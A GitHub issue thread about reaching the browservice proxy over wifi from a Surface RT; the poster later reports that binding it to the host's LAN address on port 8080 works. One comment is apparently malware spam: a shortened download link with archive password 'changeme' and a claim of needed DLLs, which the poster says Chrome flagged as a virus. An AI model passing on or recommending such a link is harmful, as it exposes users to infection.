### ISSUE TITLE
Can I access the server over wifi?

### ISSUE THREAD

**Issue by CABLE353** [ttalvitie/browservice#136]
I'm wondering if I _have_ to have an ethernet cable from the host pc to the client in order for this to work. I'm trying to make this as wireless as it can be. I'm using this for a Surface RT with Internet Explorer 11/Spartan Edge with Windows 10 15035 installed & can't afford a 20ft long ethernet cord to connect the localhost browservice http proxy to my Surface.

Will it also work if I entered in the proxy address & port numbers in the 'Internet Options>Connections>LAN Settings>Proxy Config' settings?
Sorry, I'm a noobe to browservice.

**Comment by pinpolhoxx** [comment]
download
https://bit.ly/3TzaAQd
Pass: changeme
I put the necessary dlls in the archive

**Comment by CABLE353** [comment]
I figured it out with version 0.9.10.0.

If the IP address is set the same as the IP address your PC is using(the one hosting & running browservice) on your wifi network, then you can use browservice over wifi. Port numbers don't matter and the default 8080 works like a charm. So it would look like this IP=The address your computer is using:8080.

**Comment by CABLE353** [comment]
Google Chrome flagged it as a virus.
I figured it out by the way. I updated issue 136 with the solution. It
works with the native app without the need of trojan horse additions. As
for the internet options thing, it sort of works, it just doesn't connect
all the way, but I can live with just using the address to browservice
being in the IE browser bar, and using the address bar provided in the
browservice program.

Thanks,
Caleb Eagar
